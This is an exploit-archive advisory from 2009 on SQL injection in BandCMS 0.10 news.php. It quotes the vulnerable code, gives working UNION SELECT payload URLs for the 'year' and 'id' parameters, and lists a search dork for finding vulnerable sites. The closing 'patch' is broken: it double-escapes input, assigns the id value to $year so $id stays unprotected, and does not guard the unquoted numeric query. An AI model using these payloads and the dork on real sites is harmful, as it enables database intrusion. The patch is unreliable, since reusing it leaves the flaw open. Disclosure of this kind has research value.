[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities
# Published : 2009-08-31
# Author : Affix
# Previous Title : Re-Script v.0.99 Beta ( listings.php op ) SQL Injection Vulnerability
# Next Title : Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability


#################################################################
#	 _______ _________ _       				#
#       (  ____ )__   __/( (    /|				#
#	| (    )|   ) (   |    ( |				#
#	| (____)|   | |   |    | |				#
#	|     __)   | |   | ( ) |				#
#	| ( (      | |   | |    |				#
#	| )  __   | |   | )    |				#
#	|/   __/   )_(   |/    )_)				#
#       	http://root-the.net 				#
#################################################################
#[+] BandCMS v0.10 news.php Milti SQL Injection Vulnerabilities	#
#[+] Vendor : http://rockband.sourceforge.net/			#
#[+] Exploit : Affix <root@root-the.net>			#
#[+] Dork : "Powered by Rock Band CMS 0.10"			#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      	  str0ke, tekto, raT, uNkn0wn.ws, ryan1918.com	#
#################################################################
#	BandCMS v0.10 Has an SQL Injection in news.php 		#
#								#
#	Code :							#
#	 if(isset($_GET['year'])){				#
#		$year = $_GET['year'];				#
#		$smarty->assign('news', $db->getNewsYear($year));
#	}							#
#								#
#								#
#	Exploit :						#
#	http://site.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--
#								#
#								#
#	Code :							#
#	    $id = $_GET['id'];					#
#	    $newsItem = $db->getNewsItem($id);			#
#	    $smarty->assign('news', $newsItem);			#
#								#
#	Exploit :						#
#	http://site.com/news.php?id=-1+UNION+SELECT+1,2,3,4--	#
#								#
#								#
#	Patch :							#
#	Since Im a Nice guy here is a change both variables as	#
#	follows							#
#								#
#  $year = addslashes(mysql_real_escape_string($_GET['year']));	#
#								#
#	$year = addslashes(mysql_real_escape_string($_GET['id']));
#								#
#################################################################

# www.Syue.com [2009-08-31]